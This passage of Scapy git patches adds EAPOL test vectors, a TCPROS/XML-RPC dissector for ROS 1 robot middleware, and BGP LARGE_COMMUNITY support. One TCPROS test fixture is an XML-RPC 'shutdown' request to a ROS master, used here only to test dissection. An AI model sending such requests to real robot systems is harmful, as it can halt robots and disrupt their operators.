b'\x02\x03\x00\x97\x02\x13\xca\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01\x12\x6a\xce\x64\xc1\xa6\x44\xd2\x7b\x84\xe0\x39\x26\x3b\x63\x3b\xc3\x74\xe3\x29\x9d\x7d\x45\xe1\xc4\x25\x44\x05\x48\x05\xbf\xe5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xce\x1f\x1e\x80\xe7\x6c\xbf\x4a\x5c\xe9\xce\x84\x6d\x20\x7f\x7d\x00\x38\x10\xcc\x53\x66\x65\x5f\x7f\xf5\xd5\x5a\xf8\xc3\x87\x69\x85\xde\x7d\x96\xaa\xfd\x2b\x93\x48\x9f\x6c\xdf\x5f\x9c\x26\x2b\xe1\xad\x21\xeb\xce\x62\xc9\x4d\x88\x97\x1f\xd7\x5e\x23\xf6\x96\xf6\xc0\xe0\x1e\xf3\x52\x85\xe2\xf2\xcc' +eapol = EAPOL(s) +assert(eapol.version == 2) +assert(eapol.type == 3) +assert(eapol.len == 151) +assert(eapol.haslayer(EAPOL_KEY)) +eapol_key = eapol[EAPOL_KEY] +assert(eapol_key.key_descriptor_type == 2) +assert(eapol_key.key_descriptor_type_version == 2) +assert(eapol_key.key_type == 1) +assert(eapol_key.key_length == 16) +assert(eapol_key.install == 1) +assert(eapol_key.key_ack == 1) +assert(eapol_key.has_key_mic == 1) +assert(eapol_key.secure == 1) +assert(eapol_key.key_data_length == 56) +assert(eapol_key.guess_key_number() == 3) + += EAPOL_KEY - Key 4 - Dissection (4) +s = b'\x02\x03\x00\x5f\x02\x03\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01\x60\x5e\x85\xa7\x9c\xfa\xfd\xb0\xea\xa0\x50\x68\x3f\x97\xbe\x1b\x66\xde\xf7\xbc\x65\x20\x57\x31\x68\x71\xc2\x73\xc5\xae\x47\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x27\x95\xe1\x76\xeb\x6b\xba\xc1\x6e\x06\x16\xb4\x14\x94\xd6\x0a\x00\x00' +eapol = EAPOL(s) +assert(eapol.version == 2) +assert(eapol.type == 3) +assert(eapol.len == 95) +assert(eapol.haslayer(EAPOL_KEY)) +eapol_key = eapol[EAPOL_KEY] +assert(eapol_key.key_descriptor_type == 2) +assert(eapol_key.key_descriptor_type_version == 2) +assert(eapol_key.key_type == 1) +assert(eapol_key.key_length == 16) +assert(eapol_key.install == 0) +assert(eapol_key.key_ack == 0) +assert(eapol_key.has_key_mic == 1) +assert(eapol_key.secure == 1) +assert(eapol_key.key_data_length == 0) +assert(eapol_key.key_data == b'') +assert(eapol_key.guess_key_number() == 4) + ############ ############ From 3abda536e9b6ab33b512917b9f6fbe34c5470685 Mon Sep 17 00:00:00 2001 From: fouzhe <862006904@qq.com> Date: Thu, 25 Nov 2021 10:26:30 +0800 Subject: [PATCH 1174/1632] avoid repeated update of some fields --- scapy/packet.py | 1 + 1 file changed, 1 insertion(+) diff --git a/scapy/packet.py b/scapy/packet.py index 992a1a69c76..e6c6ff72b40 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -2577,6 +2577,7 @@ def fuzz(p, # type: _P for key, val in new_default_fields.items() } q.default_fields.update(new_default_fields) + new_default_fields.clear() # add the random values of the MultipleTypeFields for name in multiple_type_fields: fld = cast(MultipleTypeField, q.get_field(name)) From 329e61d6c5eb7de4635f5a72b586e9a48f43c674 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?V=C3=ADctor=20Mayoral=20Vilches?= Date: Sun, 4 Feb 2024 22:22:30 +0100 Subject: [PATCH 1175/1632] Add TCPROS layer to contrib (#3462) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Add TCPROS layer to contrib The Robot Operating System (ROS) is a framework for robot application development which provides modular distributed software for building a variety of robot applications. This layer allows to dissect ROS's (ROS 1) TCP-based communication middleware. Signed-off-by: Víctor Mayoral Vilches * Flake8 adjustments Signed-off-by: Víctor Mayoral Vilches * Fix spell checking Signed-off-by: Víctor Mayoral Vilches * Remove debug leftovers, group them under conf.debug_dissector Signed-off-by: Víctor Mayoral Vilches * Remove global nfields, use __slots__ Signed-off-by: Víctor Mayoral Vilches * Remove globals also from TCPROSBody Signed-off-by: Víctor Mayoral Vilches * Fix global var. leftovers, transform to __slots__ Signed-off-by: Víctor Mayoral Vilches * Simplify license Signed-off-by: Víctor Mayoral Vilches * Bind TCPROS tests to 11311 Signed-off-by: Víctor Mayoral Vilches * Deal with flake8 issues Signed-off-by: Víctor Mayoral Vilches * Address codacy issues Signed-off-by: Víctor Mayoral Vilches --------- Signed-off-by: Víctor Mayoral Vilches --- scapy/contrib/tcpros.py | 713 ++++++++++++++++++++++++++++++++++++++++ test/contrib/tcpros.uts | 58 ++++ tox.ini | 2 +- 3 files changed, 772 insertions(+), 1 deletion(-) create mode 100644 scapy/contrib/tcpros.py create mode 100644 test/contrib/tcpros.uts diff --git a/scapy/contrib/tcpros.py b/scapy/contrib/tcpros.py new file mode 100644 index 00000000000..7212cd6e0e1 --- /dev/null +++ b/scapy/contrib/tcpros.py @@ -0,0 +1,713 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Víctor Mayoral-Vilches +# This program is published under a GPLv2 license + +""" +TCPROS transport layer for ROS Melodic Morenia 1.14.5 +""" +# scapy.contrib.description = TCPROS transport layer for ROS Melodic Morenia +# scapy.contrib.status = loads +# scapy.contrib.name = tcpros + +import struct +from scapy.compat import raw +from scapy.fields import ( + LEIntField, + StrLenField, + FieldLenField, + StrFixedLenField, + ByteField, +) +from scapy.layers.http import HTTP, HTTPRequest, HTTPResponse +from scapy.packet import Packet, Raw, PacketListField +from scapy.config import conf + + +class TCPROS(Packet): + """ + TCPROS is a transport layer for ROS Messages and Services. It uses standard + TCP/IP sockets for transporting message data. Inbound connections are + received via a TCP Server Socket with a header containing message data type + and routing information. + + This class focuses on capturing the ROS Slave API + + An example package is presented below:: + + B0 00 00 00 26 00 00 00 63 61 6C 6C 65 72 69 64 ....&...callerid + 3D 2F 72 6F 73 74 6F 70 69 63 5F 38 38 33 30 35 =/rostopic_88305 + 5F 31 35 39 31 35 33 38 37 38 37 35 30 31 0A 00 _1591538787501.. + 00 00 6C 61 74 63 68 69 6E 67 3D 31 27 00 00 00 ..latching=1'... + 6D 64 35 73 75 6D 3D 39 39 32 63 65 38 61 31 36 md5sum=992ce8a16 + 38 37 63 65 63 38 63 38 62 64 38 38 33 65 63 37 87cec8c8bd883ec7 + 33 63 61 34 31 64 31 1F 00 00 00 6D 65 73 73 61 3ca41d1....messa + 67 65 5F 64 65 66 69 6E 69 74 69 6F 6E 3D 73 74 ge_definition=st + 72 69 6E 67 20 64 61 74 61 0A 0E 00 00 00 74 6F ring data.....to + 70 69 63 3D 2F 63 68 61 74 74 65 72 14 00 00 00 pic=/chatter.... + 74 79 70 65 3D 73 74 64 5F 6D 73 67 73 2F 53 74 type=std_msgs/St + 72 69 6E 67 ring + + Sources: + - http://wiki.ros.org/ROS/TCPROS + - http://wiki.ros.org/ROS/Connection%20Header + - https://docs.python.org/3/library/struct.html + - https://scapy.readthedocs.io/en/latest/build_dissect.html + + TODO: + - Extend to support subscriber's interactions + - Unify with subscriber's header + + NOTES: + - 4-byte length + [4-byte field length + field=value ]* + - All length fields are little-endian integers. Field names and + values are strings. + - Cooked as of ROS Melodic Morenia v1.14.5. + """ + + name = "TCPROS" + + def guess_payload_class(self, payload): + string_payload = payload.decode("iso-8859-1") # decode to string + # for search + + # flag indicating if the TCPROS encoding format is met + # 4-byte length + [4-byte field length + field=value ]* + total_length = len(payload) + total_length_payload = struct.unpack(" total_length_payload) and ( + total_length_payload == remain_len + ) + + if conf.debug_dissector: + print(payload) + print(string_payload) + print("total_length: " + str(total_length)) + print("total_length_payload: " + str(total_length_payload)) + print("remain: " + str(remain)) + print(flag_encoding_format) + + flag_encoding_format_subfields = False + if flag_encoding_format: + # flag indicating that sub-fields meet + # TCPROS encoding format: + # [4-byte field length + field=value ]* + flag_encoding_format_subfields = True + while remain: + field_len_bytes = struct.unpack(" + 0100 0A 3C 6D 65 74 68 6F 64 43 61 6C 6C 3E 0A 3C 6D ..getPid + 0120 3C 2F 6D 65 74 68 6F 64 4E 61 6D 65 3E 0A 3C 70 .

      ..< + 0140 76 61 6C 75 65 3E 3C 73 74 72 69 6E 67 3E 2F 72 value>/r + 0150 6F 73 74 6F 70 69 63 3C 2F 73 74 72 69 6E 67 3E ostopic + 0160 3C 2F 76 61 6C 75 65 3E 0A 3C 2F 70 61 72 61 6D .... + + The counterpart (the Master) answers with (HTTP Response):: + + 0000 02 42 0C 00 00 04 02 42 0C 00 00 02 08 00 45 00 .B.....B......E. + 0010 01 A2 8C CD 40 00 40 06 94 83 0C 00 00 02 0C 00 ....@.@......... + 0020 00 04 2C 2F 8E 62 87 00 82 4C C7 A9 93 F1 80 18 ..,/.b...L...... + 0030 01 F6 19 9A 00 00 01 01 08 0A 39 82 4B 7B BB 36 ..........9.K{.6 + 0040 D2 1A 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F ..HTTP/1.1 200 O + 0050 4B 0D 0A 53 65 72 76 65 72 3A 20 42 61 73 65 48 K..Server: BaseH + 0060 54 54 50 2F 30 2E 33 20 50 79 74 68 6F 6E 2F 32 TTP/0.3 Python/2 + 0070 2E 37 2E 31 37 0D 0A 44 61 74 65 3A 20 53 75 6E .7.17..Date: Sun + 0080 2C 20 30 36 20 44 65 63 20 32 30 32 30 20 31 35 , 06 Dec 2020 15 + 0090 3A 31 37 3A 33 38 20 47 4D 54 0D 0A 43 6F 6E 74 :17:38 GMT..Cont + 00a0 65 6E 74 2D 74 79 70 65 3A 20 74 65 78 74 2F 78 ent-type: text/x + 00b0 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 6C 65 6E 67 ml..Content-leng + 00c0 74 68 3A 20 32 32 39 0D 0A 0D 0A 3C 3F 78 6D 6C th: 229.... + 00e0 0A 3C 6D 65 74 68 6F 64 52 65 73 70 6F 6E 73 65 .....< + 0120 69 6E 74 3E 31 3C 2F 69 6E 74 3E 3C 2F 76 61 6C int>1..398..... + + + In another communication, and endpoint could request a parameter using the + Parameter Server API (HTTP Request):: + + 0000 02 42 0C 00 00 02 02 42 0C 00 00 04 08 00 45 00 .B.....B......E. + 0010 01 C0 8B 72 40 00 40 06 95 C0 0C 00 00 04 0C 00 ...r@.@......... + 0020 00 02 90 10 2C 2F 9D 09 47 7F EC C3 08 BD 80 18 ....,/..G....... + 0030 01 FD 19 B8 00 00 01 01 08 0A BB 86 68 91 39 D1 ............h.9. + 0040 E1 F1 50 4F 53 54 20 2F 52 50 43 32 20 48 54 54 ..POST /RPC2 HTT + 0050 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 31 32 2E P/1.1..Host: 12. + 0060 30 2E 30 2E 32 3A 31 31 33 31 31 0D 0A 41 63 63 0.0.2:11311..Acc + 0070 65 70 74 2D 45 6E 63 6F 64 69 6E 67 3A 20 67 7A ept-Encoding: gz + 0080 69 70 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 ip..User-Agent: + 0090 78 6D 6C 72 70 63 6C 69 62 2E 70 79 2F 31 2E 30 xmlrpclib.py/1.0 + 00a0 2E 31 20 28 62 79 20 77 77 77 2E 70 79 74 68 6F .1 (by www.pytho + 00b0 6E 77 61 72 65 2E 63 6F 6D 29 0D 0A 43 6F 6E 74 nware.com)..Cont + 00c0 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 78 ent-Type: text/x + 00d0 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 ml..Content-Leng + 00e0 74 68 3A 20 32 32 37 0D 0A 0D 0A 3C 3F 78 6D 6C th: 227.... + 0100 0A 3C 6D 65 74 68 6F 64 43 61 6C 6C 3E 0A 3C 6D ..getPar + 0120 61 6D 3C 2F 6D 65 74 68 6F 64 4E 61 6D 65 3E 0A am. + 0130 3C 70 61 72 61 6D 73 3E 0A 3C 70 61 72 61 6D 3E . + 0140 0A 3C 76 61 6C 75 65 3E 3C 73 74 72 69 6E 67 3E . + 0150 2F 72 6F 73 70 61 72 61 6D 2D 38 32 30 34 33 3C /rosparam-82043< + 0160 2F 73 74 72 69 6E 67 3E 3C 2F 76 61 6C 75 65 3E /string> + 0170 0A 3C 2F 70 61 72 61 6D 3E 0A 3C 70 61 72 61 6D .../rosdistro.

      .. + 01c0 3C 2F 6D 65 74 68 6F 64 43 61 6C 6C 3E 0A . + + Sources: + - https://aliasrobotics.com/files/ + securing_robot_endpoints_ot_environment.pdf + - http://wiki.ros.org/ROS/Master_API + - http://wiki.ros.org/ROS/Slave_API + - http://wiki.ros.org/ROS/Parameter%20Server%20API + + """ + + name = "XMLRPC" + + def guess_payload_class(self, payload): + string_payload = payload.decode("iso-8859-1") # decode for search + # total_length = len(payload) + + if "xml" in string_payload and "version='1.0'" in string_payload: + if isinstance(self.underlayer, HTTPRequest): + return XMLRPCCall + elif isinstance(self.underlayer, HTTPResponse): + return XMLRPCResponse + else: + print("failed to match") + return Raw + else: + return Raw(self, payload) # returns Raw layer grouping not only + # the payload but this layer itself. + + +# Fields +class XMLRPCSeparator(ByteField): + """ + Separator of XML-RPC components - 0x0a + + """ + + def __init__(self, name, default="0x0a"): + ByteField.__init__(self, name, default) + + +# Packages +class XMLRPCCall(Packet): + """ + Request side of the ROS XMLPC elements used by Master and Parameter APIs + Exemplary package:: + + 0000 02 42 0C 00 00 02 02 42 0C 00 00 04 08 00 45 00 .B.....B......E. + 0010 01 C0 8B 72 40 00 40 06 95 C0 0C 00 00 04 0C 00 ...r@.@......... + 0020 00 02 90 10 2C 2F 9D 09 47 7F EC C3 08 BD 80 18 ....,/..G....... + 0030 01 FD 19 B8 00 00 01 01 08 0A BB 86 68 91 39 D1 ............h.9. + 0040 E1 F1 50 4F 53 54 20 2F 52 50 43 32 20 48 54 54 ..POST /RPC2 HTT + 0050 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 31 32 2E P/1.1..Host: 12. + 0060 30 2E 30 2E 32 3A 31 31 33 31 31 0D 0A 41 63 63 0.0.2:11311..Acc + 0070 65 70 74 2D 45 6E 63 6F 64 69 6E 67 3A 20 67 7A ept-Encoding: gz + 0080 69 70 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 ip..User-Agent: + 0090 78 6D 6C 72 70 63 6C 69 62 2E 70 79 2F 31 2E 30 xmlrpclib.py/1.0 + 00a0 2E 31 20 28 62 79 20 77 77 77 2E 70 79 74 68 6F .1 (by www.pytho + 00b0 6E 77 61 72 65 2E 63 6F 6D 29 0D 0A 43 6F 6E 74 nware.com)..Cont + 00c0 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 78 ent-Type: text/x + 00d0 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 ml..Content-Leng + 00e0 74 68 3A 20 32 32 37 0D 0A 0D 0A 3C 3F 78 6D 6C th: 227.... + 0100 0A 3C 6D 65 74 68 6F 64 43 61 6C 6C 3E 0A 3C 6D ..getPar + 0120 61 6D 3C 2F 6D 65 74 68 6F 64 4E 61 6D 65 3E 0A am. + 0130 3C 70 61 72 61 6D 73 3E 0A 3C 70 61 72 61 6D 3E . + 0140 0A 3C 76 61 6C 75 65 3E 3C 73 74 72 69 6E 67 3E . + 0150 2F 72 6F 73 70 61 72 61 6D 2D 38 32 30 34 33 3C /rosparam-82043< + 0160 2F 73 74 72 69 6E 67 3E 3C 2F 76 61 6C 75 65 3E /string> + 0170 0A 3C 2F 70 61 72 61 6D 3E 0A 3C 70 61 72 61 6D .../rosdistro.

      .      . + 01c0 3C 2F 6D 65 74 68 6F 64 43 61 6C 6C 3E 0A       . + + """ + + name = "XMLRPCCall" + __slots__ = Packet.__slots__ + ["methodname_size", "params_size"] + fields_desc = [ + # .. + StrFixedLenField( + "version", + "\n", + length=22, # 22 + ), + # XMLRPCSeparator("separator_version"), + StrFixedLenField("methodcall_opentag", "\n", length=13), + # getParam. + StrFixedLenField("methodname_opentag", "", length=12), + StrLenField("methodname", "getParam", + length_from=lambda pkt: pkt.methodname_size), + StrFixedLenField("methodname_closetag", "\n", length=14), + # . + StrFixedLenField("params_opentag", "\n", length=9), + # [./rosparam-82043..] + StrLenField( + "params", + "\n/rosparam-82043" + \ + "\n\n", + length_from=lambda pkt: pkt.params_size, + ), + # .. + StrFixedLenField("params_closetag", "\n", length=10), + StrFixedLenField("methodcall_closetag", "\n", length=14), + ] + + def pre_dissect(self, s): + """ + Calculate the sizes of: + - methodname + - params + + See https://docs.python.org/3/library/struct.html + for the unpack (e.g. "") + + len(""):decoded_s.find("") + ] + ) + + self.params_size = len( + decoded_s[ + decoded_s.find("\n") + + len("\n"):decoded_s.find("") + ] + ) + + if conf.debug_dissector: + print(self.methodname_size) + print(self.params_size) + return s + + def do_dissect_payload(self, s): + self.guess_payload_class(s) + + +class XMLRPCResponse(Packet): + """ + Response side of the ROS XMLPC elements used by Master and Parameter APIs + Exemplary package:: + + 0000 02 42 0C 00 00 04 02 42 0C 00 00 02 08 00 45 00 .B.....B......E. + 0010 01 A2 8C CD 40 00 40 06 94 83 0C 00 00 02 0C 00 ....@.@......... + 0020 00 04 2C 2F 8E 62 87 00 82 4C C7 A9 93 F1 80 18 ..,/.b...L...... + 0030 01 F6 19 9A 00 00 01 01 08 0A 39 82 4B 7B BB 36 ..........9.K{.6 + 0040 D2 1A 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F ..HTTP/1.1 200 O + 0050 4B 0D 0A 53 65 72 76 65 72 3A 20 42 61 73 65 48 K..Server: BaseH + 0060 54 54 50 2F 30 2E 33 20 50 79 74 68 6F 6E 2F 32 TTP/0.3 Python/2 + 0070 2E 37 2E 31 37 0D 0A 44 61 74 65 3A 20 53 75 6E .7.17..Date: Sun + 0080 2C 20 30 36 20 44 65 63 20 32 30 32 30 20 31 35 , 06 Dec 2020 15 + 0090 3A 31 37 3A 33 38 20 47 4D 54 0D 0A 43 6F 6E 74 :17:38 GMT..Cont + 00a0 65 6E 74 2D 74 79 70 65 3A 20 74 65 78 74 2F 78 ent-type: text/x + 00b0 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 6C 65 6E 67 ml..Content-leng + 00c0 74 68 3A 20 32 32 39 0D 0A 0D 0A 3C 3F 78 6D 6C th: 229.... + 00e0 0A 3C 6D 65 74 68 6F 64 52 65 73 70 6F 6E 73 65 .....< + 0120 69 6E 74 3E 31 3C 2F 69 6E 74 3E 3C 2F 76 61 6C int>1..398..... + """ + + name = "XMLRPCResponse" + __slots__ = Packet.__slots__ + ["params_size"] + fields_desc = [ + # \n + StrFixedLenField("version", "\n", length=22), + # XMLRPCSeparator("separator_version"), + # \n + StrFixedLenField("methodcall_opentag", "\n", + length=17), + # \n + StrFixedLenField("params_opentag", "\n", + length=9), + # \n\n + # 1\n + # Parameter [/rosdistro]\n + # melodic\n\n + # \n\n + StrLenField("params", "", length_from=lambda pkt: pkt.params_size), + # \n\n + StrFixedLenField("params_closetag", "\n", length=10), + StrFixedLenField("methodcall_closetag", "\n", + length=18), + ] + + def pre_dissect(self, s): + """ + Calculate the sizes of: + - methodname + - params + + See https://docs.python.org/3/library/struct.html + for the unpack (e.g. "\n") + + len("\n"):decoded_s.find("") + ] + ) + + if conf.debug_dissector: + print(self.params_size) + return s + + def do_dissect_payload(self, s): + self.guess_payload_class(s) diff --git a/test/contrib/tcpros.uts b/test/contrib/tcpros.uts new file mode 100644 index 00000000000..04468b6bb70 --- /dev/null +++ b/test/contrib/tcpros.uts @@ -0,0 +1,58 @@ +% TCPROS transport layer for ROS Melodic Morenia 1.14.5 dissection +% +% Copyright (C) Víctor Mayoral-Vilches +% +% This program is free software; you can redistribute it and/or modify it under +% the terms of the GNU General Public License as published by the Free Software +% Foundation; either version 2 of the License, or (at your option) any later +% version. +% +% This program is distributed in the hope that it will be useful, but WITHOUT ANY +% WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A +% PARTICULAR PURPOSE. See the GNU General Public License for more details. +% +% You should have received a copy of the GNU General Public License along with +% this program; if not, write to the Free Software Foundation, Inc., 51 Franklin +% Street, Fifth Floor, Boston, MA 02110-1301, USA. + +% TCPROS layer test campaign + ++ Syntax check += Import the RTPS layer +from scapy.contrib.tcpros import * + +bind_layers(TCP, TCPROS, sport=11311) +bind_layers(HTTPRequest, XMLRPC) +bind_layers(HTTPResponse, XMLRPC) + +pkt = b"POST /RPC2 HTTP/1.1\r\nAccept-Encoding: gzip\r\nContent-Length: " \ + b"227\r\nContent-Type: text/xml\r\nHost: 12.0.0.2:11311\r\nUser-Agent:" \ + b"xmlrpclib.py/1.0.1 (by www.pythonware.com)\r\n\r\n\n\nshutdown\n" \ + b"\n\n/rosparam-92418\n" \ + b"\n\nBOOM" \ + b"\n\n\n\n" + +p = TCPROS(pkt) + ++ Test TCPROS += Test basic package composition +assert(HTTP in p) +assert(HTTPRequest in p) +assert(XMLRPC in p) +assert(XMLRPCCall in p) + += Test HTTPRequest within TCPROS +assert(p[HTTPRequest].Content_Length == b'227') +assert(p[HTTPRequest].Content_Type == b'text/xml') +assert(p[HTTPRequest].Host == b'12.0.0.2:11311') +assert(p[HTTPRequest].User_Agent == b'xmlrpclib.py/1.0.1 (by www.pythonware.com)') +assert(p[HTTPRequest].Method == b'POST') +assert(p[HTTPRequest].Path == b'/RPC2') +assert(p[HTTPRequest].Http_Version == b'HTTP/1.1') + += Test XMLRPCCall within TCPROS +assert(p[XMLRPCCall].version == b"\n") +assert(p[XMLRPCCall].methodcall_opentag == b'\n') +assert(p[XMLRPCCall].methodname == b'shutdown') +assert(p[XMLRPCCall].params == b'\n/rosparam-92418\n\n\nBOOM\n\n') diff --git a/tox.ini b/tox.ini index 29860fa39f0..4a987fa87f2 100644 --- a/tox.ini +++ b/tox.ini @@ -137,7 +137,7 @@ description = "Check code for Grammar mistakes" skip_install = true deps = codespell # inet6, dhcp6 and the ipynb files contains french: ignore them -commands = codespell --ignore-words=.config/codespell_ignore.txt --skip="*.pyc,*.png,*.jpg,*.ods,*.raw,*.pdf,*.pcap,*.js,*.html,*.der,*_build*,*inet6.py,*dhcp6.py,*.ipynb,*.svg,*.gif,*.obs,*.gz" scapy/ doc/ test/ .github/ +commands = codespell --ignore-words=.config/codespell_ignore.txt --skip="*.pyc,*.png,*.jpg,*.ods,*.raw,*.pdf,*.pcap,*.js,*.html,*.der,*_build*,*inet6.py,*dhcp6.py,*tcpros.py,*.ipynb,*.svg,*.gif,*.obs,*.gz" scapy/ doc/ test/ .github/ [testenv:twine] From 9b52205fb80f04ba201e07ff0da10e154092c6da Mon Sep 17 00:00:00 2001 From: Qingtian-Zou <33162804+Qingtian-Zou@users.noreply.github.com> Date: Sun, 4 Feb 2024 16:11:07 -0600 Subject: [PATCH 1176/1632] Add BGP LARGE_COMMUNITY Path Attribute (#3535) * add bgp LARGE_COMMUNITY * add BGP LARGE_COMMUNITY class tests * fix dissecting a whole BGP layer * 1. Move and rename class 2. flake8 style fix --- scapy/contrib/bgp.py | 36 ++++++++++++++++++++++++++++++++++-- test/contrib/bgp.uts | 14 ++++++++++++++ 2 files changed, 48 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/bgp.py b/scapy/contrib/bgp.py index af988cf08df..4da780d287a 100644 --- a/scapy/contrib/bgp.py +++ b/scapy/contrib/bgp.py @@ -1042,6 +1042,7 @@ def post_build(self, p, pay): 27: "PE Distinguisher Labels", # RFC 6514 28: "BGP Entropy Label Capability Attribute (deprecated)", # RFC 6790, RFC 7447 # noqa: E501 29: "BGP-LS Attribute", # RFC 7752 + 32: "LARGE_COMMUNITY", # RFC 8092, RFC 8195 40: "BGP Prefix-SID", # (TEMPORARY - registered 2015-09-30, expires 2016-09-30) # noqa: E501 # draft-ietf-idr-bgp-prefix-sid 128: "ATTR_SET", # RFC 6368 @@ -1079,6 +1080,7 @@ def post_build(self, p, pay): 27: 0xc0, # PE Distinguisher Labels (RFC 6514) 28: 0xc0, # BGP Entropy Label Capability Attribute 29: 0x80, # BGP-LS Attribute + 32: 0xc0, # LARGE_COMMUNITY 40: 0xc0, # BGP Prefix-SID 128: 0xc0 # ATTR_SET (RFC 6368) } @@ -1992,10 +1994,37 @@ def post_build(self, p, pay): return p + pay +# +# LARGE_COMMUNITY +# + +class BGPLargeCommunitySegment(Packet): + """ + Provides an implementation for LARGE_COMMUNITY segments + which holds 3*4 bytes integers. + """ + + fields_desc = [ + IntField("global_administrator", None), + IntField("local_data_part1", None), + IntField("local_data_part2", None) + ] + + +class BGPPALargeCommunity(Packet): + """ + Provides an implementation of the LARGE_COMMUNITY attribute. + References: RFC 8092, RFC 8195 + """ + + name = "LARGE_COMMUNITY" + fields_desc = [PacketListField("segments", [], BGPLargeCommunitySegment)] + # # AS4_AGGREGATOR # + class BGPPAAS4Aggregator(Packet): """ Provides an implementation of the AS4_AGGREGATOR attribute @@ -2023,7 +2052,8 @@ class BGPPAAS4Aggregator(Packet): 0x0F: "BGPPAMPUnreachNLRI", 0x10: "BGPPAExtComms", 0x11: "BGPPAAS4Path", - 0x19: "BGPPAIPv6AddressSpecificExtComm" + 0x19: "BGPPAIPv6AddressSpecificExtComm", + 0x20: "BGPPALargeCommunity" } @@ -2040,7 +2070,7 @@ def m2i(self, pkt, m): if type_code == 0 or type_code == 255: ret = conf.raw_layer(m) # Unassigned - elif (type_code >= 30 and type_code <= 39) or\ + elif (type_code >= 33 and type_code <= 39) or\ (type_code >= 41 and type_code <= 127) or\ (type_code >= 129 and type_code <= 254): ret = conf.raw_layer(m) @@ -2048,6 +2078,8 @@ def m2i(self, pkt, m): else: if type_code == 0x02 and not bgp_module_conf.use_2_bytes_asn: ret = BGPPAAS4BytesPath(m) + elif type_code == 0x20: + ret = BGPPALargeCommunity(m) else: ret = _get_cls( _path_attr_objects.get(type_code, conf.raw_layer))(m) diff --git a/test/contrib/bgp.uts b/test/contrib/bgp.uts index 6b1edfea1f9..cebb1bfafe4 100644 --- a/test/contrib/bgp.uts +++ b/test/contrib/bgp.uts @@ -597,6 +597,20 @@ a = BGPPAAS4Aggregator(b'&kN%\xc0\x00\x02\x01') a.aggregator_asn == 644566565 and a.speaker_address == "192.0.2.1" +############################# BGPPALargeCommunity ############################ ++ BGPPALargeCommunity class tests + += BGPPALargeCommunity - Instantiation +raw(BGPPALargeCommunity()) == b'' + += BGPPALargeCommunity - Instantiation with specific values +raw(BGPPALargeCommunity(segments=BGPLargeCommunitySegment(global_administrator=161,local_data_part1=0,local_data_part2=0))) == b'\x00\x00\x00\xa1\x00\x00\x00\x00\x00\x00\x00\x00' + += BGPPALargeCommunity - Dissection +a = BGPPALargeCommunity(b'\x00\x00\x00\xa1\x00\x00\x00\x00\x00\x00\x00\x00') +a.segments[0].global_administrator == 161 and a.segments[0].local_data_part1 == 0 and a.segments[0].local_data_part2 == 0 + + ################################ BGPPathAttr ################################# + BGPPathAttr class tests From 3affdba9f3aa1668dd16259fa56e720653114aa9 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 4 Feb 2024 23:28:51 +0100 Subject: [PATCH 1177/1632] Scapy 2.6.0+ supports Python 3.7+ --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 8168cb94df6..63aeb589c02 100644 --- a/README.md +++ b/README.md @@ -26,7 +26,7 @@ handle, like sending invalid frames, injecting your own 802.11 frames, combining techniques (VLAN hopping+ARP cache poisoning, VoIP decoding on WEP protected channel, ...), etc. -Scapy supports Python 2.7 and Python 3 (3.4 to 3.9). It's intended to +Scapy supports Python 3.7+. It's intended to be cross platform, and runs on many different platforms (Linux, OSX, \*BSD, and Windows). From b27081c143e19b2e59816500e917a536a0722678 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 5 Feb 2024 08:04:52 +0100 Subject: [PATCH 1178/1632] Make sure all core files have an SPDX (#4263) --- scapy/contrib/tcpros.py | 5 +++-- scapy/layers/msrpce/__init__.py | 5 +++++ scapy/layers/msrpce/raw/__init__.py | 7 +++++++ scapy/layers/ppi.py | 17 +++-------------- scapy/libs/ethertypes.py | 5 ++++- scapy/tools/check_spdx.sh | 19 +++++++++++++++++++ 6 files changed, 41 insertions(+), 17 deletions(-) create mode 100644 scapy/tools/check_spdx.sh diff --git a/scapy/contrib/tcpros.py b/scapy/contrib/tcpros.py index 7212cd6e0e1..90773d32a7b 100644 --- a/scapy/contrib/tcpros.py +++ b/scapy/contrib/tcpros.py @@ -1,11 +1,12 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Víctor Mayoral-Vilches -# This program is published under a GPLv2 license """ TCPROS transport layer for ROS Melodic Morenia 1.14.5 """ + # scapy.contrib.description = TCPROS transport layer for ROS Melodic Morenia # scapy.contrib.status = loads # scapy.contrib.name = tcpros diff --git a/scapy/layers/msrpce/__init__.py b/scapy/layers/msrpce/__init__.py index 5bc7f21d2bf..5379a64c917 100644 --- a/scapy/layers/msrpce/__init__.py +++ b/scapy/layers/msrpce/__init__.py @@ -1,3 +1,8 @@ +# SPDX-License-Identifier: 